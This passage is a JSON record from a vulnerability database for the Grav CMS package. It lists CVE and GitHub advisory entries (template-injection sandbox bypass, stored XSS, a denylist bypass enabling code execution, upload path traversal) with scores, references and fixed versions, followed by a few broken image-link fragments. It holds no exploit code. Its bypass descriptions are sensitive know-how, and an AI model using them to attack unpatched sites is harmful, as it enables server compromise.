"scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T16:26:05Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66301", "GHSA-v8x2-fjv7-8hjh" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y7vc-cx37-7ubs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47311?format=api", "vulnerability_id": "VCID-yh73-zyju-vqge", "summary": "Server-Side Template Injection (SSTI) with Grav CMS security sandbox bypass\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28116", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.62168", "scoring_system": "epss", "scoring_elements": "0.98379", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28116" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/" } ], "url": "https://github.com/getgrav/grav/commit/4149c81339274130742831422de2685f298f3a6e" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116", "reference_id": "CVE-2024-28116", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28116" }, { "reference_url": "https://github.com/advisories/GHSA-c9gp-64c4-2rrh", "reference_id": "GHSA-c9gp-64c4-2rrh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c9gp-64c4-2rrh" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh", "reference_id": "GHSA-c9gp-64c4-2rrh", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-01T20:55:43Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api", "purl": "pkg:composer/getgrav/grav@1.7.45", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45" } ], "aliases": [ "CVE-2024-28116", "GHSA-c9gp-64c4-2rrh" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yh73-zyju-vqge" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49445?format=api", "vulnerability_id": "VCID-ymnw-h6as-fbe5", "summary": "Grav is vulnerable to Stored XSS through authenticated user-edited content\ngrav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66843", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07703", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66843" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-16T17:33:18Z/" } ], "url": "https://github.com/Yohane-Mashiro/grav_cve/issues/1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66843", "reference_id": "CVE-2025-66843", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66843" }, { "reference_url": "https://github.com/advisories/GHSA-mh85-44c2-3m97", "reference_id": "GHSA-mh85-44c2-3m97", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mh85-44c2-3m97" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/907178?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1" } ], "aliases": [ "CVE-2025-66843", "GHSA-mh85-44c2-3m97" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ymnw-h6as-fbe5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45423?format=api", "vulnerability_id": "VCID-z1hg-w198-f7h8", "summary": "Improper Control of Generation of Code ('Code Injection')\nGrav is a file-based Web platform. Prior to version 1.7.42, there is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. The vulnerability can be found in the `GravExtension.filterFilter()` function declared in `/system/src/Grav/Common/Twig/Extension/GravExtension.php`. Version 1.7.42 contains a patch for this issue. End users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34252", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00529", "scoring_system": "epss", "scoring_elements": "0.67561", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34252" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/" } ], "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698" }, { "reference_url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/" } ], "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074" }, { "reference_url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/" } ], "url": "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec" }, { "reference_url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b" }, { "reference_url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8" }, { "reference_url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34252", "reference_id": "CVE-2023-34252", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34252" }, { "reference_url": "https://github.com/advisories/GHSA-96xv-rmwj-6p9w", "reference_id": "GHSA-96xv-rmwj-6p9w", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-96xv-rmwj-6p9w" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w", "reference_id": "GHSA-96xv-rmwj-6p9w", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api", "purl": "pkg:composer/getgrav/grav@1.7.42", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-a8y8-y4zt-zqbv" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-ru55-uj84-p3dr" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42" } ], "aliases": [ "CVE-2023-34252", "GHSA-96xv-rmwj-6p9w" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z1hg-w198-f7h8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47306?format=api", "vulnerability_id": "VCID-zg5t-uqx2-87fw", "summary": "Grav File Upload Path Traversal\nGrav is vulnerable to a file upload path traversal vulnerability, that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. This vulnerabiltiy can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing backups or creating new ones, and exfiltrating sensitive data using CSS Injection exfiltration techniques.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27921", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.08787", "scoring_system": "epss", "scoring_elements": "0.92679", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27921" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/" } ], "url": "https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27921", "reference_id": "CVE-2024-27921", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27921" }, { "reference_url": "https://github.com/advisories/GHSA-m7hx-hw6h-mqmc", "reference_id": "GHSA-m7hx-hw6h-mqmc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m7hx-hw6h-mqmc" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc", "reference_id": "GHSA-m7hx-hw6h-mqmc", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-25T16:27:48Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69508?format=api", "purl": "pkg:composer/getgrav/grav@1.7.45", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45" } ], "aliases": [ "CVE-2024-27921", "GHSA-m7hx-hw6h-mqmc" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zg5t-uqx2-87fw" } ], "fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.36" }
\n\n2](http://Perms](https://imgur.com/VkhtE9L.png)%5Cn%5Cn2){kind=link}
\n\n3](http://pages:%5Cn%5Cn%5Cn3){kind=link}
\n\n5](http://Created](https://imgur.com/o33Erj2.png)%5Cn%5Cn5){kind=link}
\n\n7](http://Grav](https://imgur.com/kjt7uc9.png)%5Cn%5Cn7){kind=link}